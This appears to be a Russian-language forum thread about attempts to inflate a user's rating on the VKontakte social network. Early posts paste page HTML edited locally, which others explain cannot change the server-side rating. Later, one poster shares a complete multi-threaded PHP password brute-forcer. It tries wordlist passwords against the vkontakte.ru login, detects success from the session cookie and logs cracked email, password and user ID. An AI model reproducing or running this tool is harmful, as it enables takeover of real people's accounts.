Нифига нет. Я на одноклассниках не зарегестрирован. Вконтакте - да. Вхожу в одноклассниках(с паролем от контакта) - не входит тебе минус
Я в ПХП не силен, но может там переменным что-нибудь поприсваивать ... может что интересное найдется (т.е. что-то типа .../feed2.php?x=2&y=3)
Приветствую Всех! Народ, прикол с женитьбой на самом себе и изменение даты рождения - это конечно весело! Но все же меня интересует более важная тема: рейтинг Я так подумал - и сделал так: захожу на мою страницу - где идет строка рейтинга - выбрал - просмотреть исходный текст (opera) - находим строку Code: <a style='text-decoration:none' href='rate.php Она отвечает за рейтинг! У меня написано так: Code: <a style='text-decoration:none' href='rate.php'> <div id="rate"> <div id="percent">95%</div> <div class="clearFix"> <div id="rateLeft" style="width:190px"> </div> <div id="rateRight" style="width:9px"> </div> </div> <p></p> Потом нашел человека с рейтингом 6542: также делаю просмотр его исходного текста: Code: <a style='text-decoration:none' href='rate.php?act=vote&id=1004596'> <div id="rateGold"> <div id="percentGold">6234</div> <div class="clearFix"> <div id="rateLeftGold" style="width:196px"> </div> <div id="rateRightGold" style="width:3px"> </div> </div> </div></a> <input type='hidden' id='seed' value='0'> Целесообразно меняю у себя! На первый раз - показывает мой рейтинг 6542! Но после обновления страницы - возобновляется обратно! У кого какие есть идеи на этот счет!? Как закрепить его!?
Сейчас увидел другую вешь: если щелкнуть по рейтингу он переходит на страницу: рейтинг Также просматриваю исходный текст: нахожу - Code: <!-- pageBody --> <div id="pageBody" class="pageBody"> <div id="wrapH"> <div id="wrapHI"> <div id="header"> <h1> Статистика</h1> </div> </div> </div> <div id="wrap2"> <div id="wrap1"> <div id="content"> <div id="rateBar" class="clearFix"> <div id="mainPanel" class="column mainPanel"> <script type="text/javascript"> var progressLine = '<div style="padding:40px 0px 20px 0px;text-align: center"><img valign="middle" src="/images/progress7.gif"></div>'; function getRatePage(page, out) { var ajax = new Ajax(); ajax.page = page; ajax.out = out; ajax.onDone = getPageSuccess; ajax.onFail = getPageFailed; ajax.post('/rate.php', {'act': 'a_get_page', 'page': page, 'out': out}); ge('rateContent').innerHTML = progressLine; } function getPageSuccess(ajaxObj, responseText) { try {json=eval("(" + responseText + ")");} catch(e) {getPageFailed;}; if(json&&json.html) { ge('rateContent').innerHTML = json.html; ge('ratePagesTopDiv').innerHTML = json.pages; ge('ratePagesBottomDiv').innerHTML = json.pages; if (!ajaxObj.out) { ge('tabIn').className = "rateTabOn"; ge('tabOut').className = "rateTabOff"; } else { ge('tabIn').className = "rateTabOff"; ge('tabOut').className = "rateTabOn"; } } } function getPageFailed(ajaxObj, responseText) { ge('rateContent').innerHTML = "Ошибка сервера."; } </script> <div class="rateHelp"> <div id="rate"> <div id="percent" style="width:100px">95%</div> <div class="clearFix"> <div id="rateLeft" style="width:380px"> </div> <div id="rateRight" style="width:18px"> </div> </div> </div> <div style="padding:4px"> <div style="margin-bottom:3px"><b>Что означает рейтинг страницы?</b></div> Рейтинг страницы определяет ее порядок при выводе в результатах поиска. Он зависит от рейтинга популярности - количества голосов, которые другие пользователи отдали в пользу автора страницы в знак уважения или симпатии. <a href='rate.php?act=help'>Помощь...</a> </div> </div> <ul class="rateTabs"> <li id="tabIn" class="rateTabOn"><a href='javascript: getRatePage(0, 0)'>Полученные голоса</a></li> <li id="tabOut" class="rateTabOff"><a href='javascript: getRatePage(0, 1)'>Отданные голоса</a></li> <li style="float:right;vertical-align:top"> <div id="ratePagesTopDiv"> </div> </li> </ul> <div style="clear:both"></div> <div id="rateRowsWrap"> <div id="rateContent"> <div class="noRate">Пока Вы не получили ни одного голоса.</div> </div> <div style="height:26px;"> <div id="ratePagesBottomDiv"> </div> </div> </div> </div> <div id="sidePanel" class="column sidePanel"> <div class="rateSideTitle"><b>Ваша страница</b></div> <div class="rateProfile"> <div><img src="/images/icons/i_photo.gif"> +25% фотография</div><div><img src="/images/icons/i_general.gif"> +10% о себе</div><div><img src="/images/icons/i_contacts.gif"> +10% контакты</div><div><img src="/images/icons/i_schools.gif"> +20% школа</div><div><img src="/images/icons/audio_icon.gif"> +10% увлечения</div><div><img src="/images/icons/event_icon.gif"> +6% места</div><div><img src="/images/icons/i_job.gif"> +10% работа</div><div><img src="/images/icons/i_uni.gif"> +4% вуз</div> <p class="rateProfileLine"> = 95% </p> </div> </div> </div> <div id="boxHolder"></div> </div> </div> </div> </div> <!-- End pageBody --> Кто как думает что здесь нужно исправить чтобы рейтинг изменился!? А это рейтинг того чувака: Code: <!-- pageBody --> <div id="pageBody" class="pageBody"> <div id="wrapH"> <div id="wrapHI"> <div id="header"> <h1> <a href='id1004596'>Алексей Лушников</a> » Голосование</h1> </div> </div> </div> <div id="wrap2"> <div id="wrap1"> <div id="content"> <script type="text/javascript"> function showHideInfo() { if (ge('infoShown').value == 1) { hide('rateInfo'); ge('infoShown').value = 0; ge('infoShowLink').innerHTML = 'подробнее...'; } else { ge('infoShown').value = 1; show('rateInfo'); ge('infoShowLink').innerHTML = 'скрыть'; } } </script> <div id="msg" style="margin:0px 10px 10px 10px">Вы не можете проголосовать за Алексея, пока не завалидировали ни один голос.</div> <div class="privacy_panel" style="margin: 0px auto 0px auto; width:480px"> <div class="privacy_panel_editor" style="width:478px"> <div class="privacy_panel_border"> <h2 style="margin:5px 10px">Текущий рейтинг Алексея</h2> <div class="privacy_panel_settings" style="text-align:left; margin:0px;padding:0px"> <div style="padding:0px 0px 10px 13px"> <div id="rateGold"> <div id="percentGold" style="width:100px">6235</div> <div class="clearFix"> <div id="rateLeftGold" style="width:398px"> </div> <div id="rateRightGold" style="width:0px"> </div> </div> </div> </div> <h2 style="margin: 5px 10px">Что такое рейтинг?</h2> <div style="margin:10px 17px 10px 20px; line-height: 140%;"> <input type="hidden" id="infoShown" name="infoShown" value="0"> При помощи рейтинга популярности <b>ВКонтакте</b> предоставляет пользователям возможность определять порядок вывода участников при поиске, в списках друзей, в списках участников групп и т.д. <small><a id="infoShowLink" href="javascript: showHideInfo();">подробнее...</a></small><br /><br /> <div id="rateInfo" style="display:none"> <div style="float:left; margin:5px 20px 5px 0px; border:1px solid #DAE1E8"><img src="images/pics/rateSample.gif"></div> Таким образом, в поиске первыми всегда выводятся активные, уважаемые, популярные и красивые люди.<br /><br /> Если Вы хотите увеличить рейтинг <b>Алексею</b>, выразить ему уважение или симпатию, Вы можете <b>отдать</b> за него голос.<br /><br /> Для того, чтобы избежать спама и накруток, мы просим Вас завалидировать Ваш голос с помощью <b>SMS</b> на номер <b>4444</b> с текстом: <div style="text-align:center; font-weight: bold; border:1px solid #DAE1E8; width: 200px; padding:5px 0px; margin:10px 10px 10px 142px; background-color:#F6F7F9">id3191437</div> <b>SMS</b> должна содержать только текст <b>id3191437</b> - и ничего кроме этого. <b>SMS</b> стоит приблизительно <a href='topic2269247'><b>$0.30</b></a> без <b>НДС</b> и на данный момент принимается на территории России, Украины и Казахстана.<br><br>Если Вы хотите проголосовать сразу за <b>10</b> Ваших друзей, Вы можете отправить <b>SMS</b> с точно таким же текстом на номер <b>4449</b> (<a href='topic2269838'>около <b>$3</b></a>).<br /><br /> После отправки <b>SMS</b> в меню в левой части страницы появится уведомление о текущем количестве голосов. Вы сможете проголосовать за любого пользователя <b>ВКонтакте</b>, нажав на его рейтинг.<br /><br /> Уведомление или поздравление от Вас, пример которого приведен выше, будет некоторое время показываться пользователю, после чего будет сохранено в его разделе <b><a href='rate.php'>Статистика</a></b>.<br /><br /> Дополнительную информацию о голосовании и рейтинге можно найти на странице <a href='rate.php?act=help'><b>Статистика: Помощь</b></a>. </div> </div> </div> </div> </div> </div> <div style="height:35px; padding-bottom:15px;"> <ul class='nNav' style="margin:15px 10px 0px 220px;"> <li style="margin-left:0px"> <b class="nc"><b class="nc1"><b></b></b><b class="nc2"><b></b></b></b> <span class="ncc"><a href="id1004596">Вернуться к странице Алексея</a></span> <b class="nc"><b class="nc2"><b></b></b><b class="nc1"><b></b></b></b> </li> </ul> </div> <div id="boxHolder"></div> </div> </div> </div> </div> <!-- End pageBody --> Попробывал изменить на = Code: <div class="rateHelp"> <div id="rateGold"> <div id="percentGold" style="width:100px">7777</div> <div class="clearFix"> <div id="rateLeftGold" style="width:380px"> </div> <div id="rateRightGoldt" style="width:18px"> </div> </div> Опять же в первый раз изменяется - а после обновления возвращается обратно! Получается эта инфа хранится где-то в другом месте... У кого есть какие идеи на этот счет!? </div>
по мне бред какой-то несёшь, твой рейтинг храниться на серваке, и если ты в опере исправил html, и на страничке увидел свой мегабольшой рейтинг- это не значит что на серваке он изменился, т.е. локально изменённое значение нельзя закрепить на серваке....
Да, но даже если он хранится на серваке, должна же быть какая-то взаимосвязь с тем что ты делаешь на своей странице - т.е. добавляя друзей, видео и прочую инфу - рейтинг растет - значит он напрямую связан с моей страницей или по крайней мере с данными на странице! = это логически! Примечание: как по твоему у некоторых людей - у которых как максимум 5 друзей, 1 видео, 1 альбом ну и прочее - в общем страница почти не заполнена - рейтинг около 1000 и того выше!? - следовательно взлом! А как это сделать тогда!? Давайте попробуем вместе логически догнать!? Или можно как нибудь заступорить рейтинг - чтобы он отображался от той инфы - которая указано в кукес!? - вроде понятно объяснил....
рейтинг явно берется не из твоей страницы, а из кол-ва данных, которые хранятся для твоего id в базе данных. Также рейтинг поднимается если за тебя шлют смс, либо указывают в настройках как человека из-за которого ты пришел в контакт.
Хм... Значит искусственно поднять нельзя!? И хотите сказать нет никакой дыры - через которое можно это сделать!? = а это где!?
поностью согласен это в "пригласить друзей" прочитав последние посты, отвечу всем: через оперу никак нельзя-нет никакой связи между добавлением в базу после отправки смски и скриптом со стороны клиента-нужно просто саму теорию php знать-сначала скрипт обрабатывается на сервере, а только потом страницу видит юзер
измените за банальный вопрос ! но кто-нибуть сканером на баги и уязвимости сканил вконтак .... или просто сервер на котором он лежит ? вот я скажу честно не пробовал потому что меня напрягают слухи про Ф з Б !!! если кто сканил поделитесь опытом что вышло ))
разсмотрим..) PHP: #!/usr/bin/php <? $mail = "[email protected]"; // that's mail for brute define(_dictf,"words.txt"); // file where placed passwords (splited by \r\n) define(_logfile,"log.txt"); // file to dump results define(_queue,100); // how mutch thread's start? (for me best results on 200<= threads...) define(_sock_test_,true); // posible lagging test ( on bad line's ) ;/ /* define(_proxy_use_) define(_proxy_host_) define(_proxy_port_) define(_proxy_type_) define(_proxy_login_) define(_proxy_passw_) $stat = new statistic(); // not curently realeased (todo)*/ define(_loghead, "[-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-]\r\n [................................................................................................]\r\n [................................................................................................]\r\n [................................................................................................]\r\n [................................................................................................]\r\n [..............................................................].................................]\r\n [................................................................................................]\r\n [................................................................................................]\r\n [................................................................................................]\r\n [................................................................................................]\r\n [................................................................................................]\r\n [-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-]\r\n _.-x={[Started in ".$stat->start." by unix time...]}=x-._ \r\n\r\n [-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-]\r\n"); class queue { var $_mail; var $pases; var $ipass; var $result; var $result_i; var $return; var $trouble; var $nbug; function queue($mail,$pass) { $this -> result_i = 0; $this -> debug_i = 0; $this -> count_result; $this -> _mail = $mail; $this -> pases = $pass; $this -> ipass = $pass; } function getback() { return $this -> result; } function init() { // echo "init()::"; while($this -> getqueue() == true) { // echo "Restarting...\r\n"; }; } function getqueue() { // echo "getqueue()::"; list ($return,$trouble,$nbug) = $this -> combine($this -> _mail,$this -> ipass); $resu = $this -> result_i + count($return); for ($i = $this -> result_i; $i < $resu; $i++) { $this -> result[$i] = $return[$i]; }; if ($trouble) { $this -> debug[$this -> debug_i] = "Found trouble.. try to do something..."; $this -> debug_i ++; for ($a = 0 ; $a < count($nbug); $a++) { $ipass[$a] = $nbug[$a]; }; // echo "Rotating..."; }; $this -> nbug = $nbug; return ($trouble); } function c_h($mail,$pass) { $ch = curl_init("http://vkontakte.ru/login.php?email=".$mail."&pass=".$pass); if ($ch) { curl_setopt($ch ,CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)'); curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 1); curl_setopt($ch, CURLOPT_OPERATIONTIMEOUT, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CUSTOMREQUEST,"HEAD"); curl_setopt($ch, CURLOPT_MUTE, true); }; return $ch; } function combine($mail,$pass) { $count = count($pass); $mh = curl_multi_init(); $trouble = false; $trouble_i = 0; for ($i = 0; $i < $count; $i++) { $conn[$i] = $this -> c_h($mail,$pass[$i]); curl_multi_add_handle ($mh,$conn[$i]); } do { $mrc = curl_multi_exec($mh, $active); } while ($mrc == CURLM_CALL_MULTI_PERFORM); while ($active and $mrc == CURLM_OK) { // wait for network if (curl_multi_select($mh) != -1) { // pull in any new data, or at least handle timeouts do { $mrc = curl_multi_exec($mh, $active); } while ($mrc == CURLM_CALL_MULTI_PERFORM); } } if ($mrc != CURLM_OK) { print "Curl multi read error $mrc\n"; } // retrieve data for ($i = 0 ; $i < $count; $i++) { if (($err = curl_error($conn[$i])) == '') { $ret[$i]=curl_multi_getcontent($conn[$i]); } else { // echo curl_error($conn[$i])."\r\n"; $trouble = true; $bug = array ($i, curl_error($conn[$i])); $nbug[$trouble_i] = $bug; $trouble_i++; $this -> debug[$this -> debug_i] = "Connection trouble while try: [".$pass[$i]."] trouble is [".curl_error($conn[$i])."]"; $this -> debug_i++; } curl_multi_remove_handle($mh,$conn[$i]); }; @curl_close($conn[$i]); curl_multi_close($mh); return array($ret,$trouble,$nbug); } }; class statistic { var $start; function statistic() { $this -> start = date("U"); } function stop() { $now = date("U"); $now = $now - $this -> start; return $now; } }; $stat = new statistic(); class found { var $_mail; var $pass; var $id; var $all; var $hash; var $fp; function found() {} function init() { $this -> all = 0; $this -> fp = fopen(_logfile,"w"); fputs($this->fp,_loghead); } function show() { for ($i = 0; $i < $this -> all; $i++) { $var = "--[ ".$i." ]--------------------------------------------------------------\r\n" . "[|] Email : " . $this->_mail[$i]."\r\n" . "[|] Passwd : " . $this-> pass[$i]."\r\n" . "[|] UsrID : " . $this->id[$i]."\r\n" . "[!] md5hash: " . $this->hash[$i]."\r\n" . "[+]------------------------------------------------------------------\r\n\r\n"; echo $var; fputs($this -> fp,$var); }; } function add($mail,$pass,$id) { $this -> _mail[$this -> all] = $mail; $this -> pass[$this -> all] = $pass; $this -> id[$this -> all] = $id; $this -> hash[$this -> all] = md5($pass); $this -> all++; } }; class statusbar { var $onepercent; function statusbar($full) { $this -> onepercent = ( $full / 100); } function show($num,$found) { // system('clear'); $perc = $num / $this -> onepercent; $now = "\r[_".round($perc)."%_] [".$found." Founded] [Complete... i'm running...]"; echo $now; } }; class parser { var $answer; var $http_answ; var $found; var $id; function parser($answer) { $this -> found = false; $this -> answer = $answer; $arr = explode("\r\n",$this -> answer); $this -> http_answ = $arr["0"]; for ($i = 0; $i < count($arr); $i++) { if (eregi("Cookie",$arr[$i])) { $mycookie = explode(" ",$arr[$i]); $temp0 = explode("=",$mycookie[1]); if ($temp0["0"] == "remixmid") { $this -> id = eregi_replace(";","",$temp0["1"]); if ($this -> id != "deleted") { $this -> found = true; }; } }else{ // $arrs = explode(": ",$arr[$i]); // var_dump($arrs); // тут мы можем проверить наличие Location в ответе... воможно будет быстрее чем вышеописаное } }; } }; function do_scan($mail,$obj) { $dictf = fopen(_dictf,"r"); while(!feof($dictf)) {$buff = $buff . fread($dictf,4096);}; $pass = explode("\n",$buff); $bar = new statusbar(count($pass)); for ($word = 0; $word < count($pass); $word++) { $bar -> show($word,$obj -> all); $a = 0; for ($a = 0 ; $a < _queue; $a++) { // echo "$argc[$a] = $pass[$a] \r\n"; $argc[$a] = $pass[$word]; // echo "pass2queue:: [ ".$argc[$a] ." is ".$word." word ]\r\n"; $word++; }; $bob = new queue ($mail, $argc); $bar -> show($word,$obj -> all); $bob -> init(); $array = $bob -> getback(); $c = 0; for ($c = 0; $c < count ($array) ; $c++) { // var_dump($array[$c]); вывести возврат от курла $f = new parser($array[$c]); if ($f -> found) { $obj -> add($mail,$argc[$c],$f -> id); }; }; /* $me = new req($mail,$pass[$word]); if ($me -> found) { $obj -> add ($me -> login, $me -> pass, $me -> id); }; */ }; return $obj; }; function test() { echo "[ Prestart testing... ] Resolving www.vkontakte.ru..."; if(!@gethostbyname("www.vkontakte.ru")) { echo "[ Error ]\r\n";exit(); }; echo "[ Ok ]\r\n"; echo "[ Prestart testing... ] Resolving vkontakte.ru..."; if(!@gethostbyname("vkontakte.ru")) { echo "[ Error ]\r\n"; exit(); }; echo "[ Ok ]\r\n"; echo "[ Testing network.... ] (by sockopen())..."; if(!@fsockopen("vkontakte.ru",80)) { echo "[ Error ]\r\n"; exit();}; echo "[ Ok ]\r\n"; echo "[ Testing curl...] ..."; if (!function_exists("curl_init")) { echo "[ Error ]\r\nTry install curl support visit php.net for more information..."; exit();}; echo "[ Ok ]\r\n"; echo "[ Testing curl version... ] ..."; if (!function_exists("curl_multi_exec")) { echo "[ Error ]\r\nTry install newest curl version for more support visit php.net for more information...\r\nCannot run multi thread, exiting...\r\n"; exit();}; echo "[ Ok ]\r\n"; echo "[ All looks like on my linux box... pretty good ;] ]\r\n[ so let's try hack that motherfucker...]\r\n"; echo "[ Testing wordlist file for open ] With fopen() ..."; if (!fopen(_dictf,"r")) { echo "[ Error ]\r\n"; exit(); }; echo "[ Ok ]\r\n"; echo "[ Testing fopen() for write log...] ..."; if (!fopen(_logfile,"w")) { echo "[ Error ]\r\n"; exit(); }; echo "[ Ok ]\r\n"; }; test(); $obj = new found(); $obj -> init(); $obj = do_scan($mail,$obj); echo "\r\n"; $obj -> show(); ?>
это просто сайт, сделанный наподобие вконтакте, но реально очень похоже мне очень понравились пароль если забыли код активации если не получили DDD
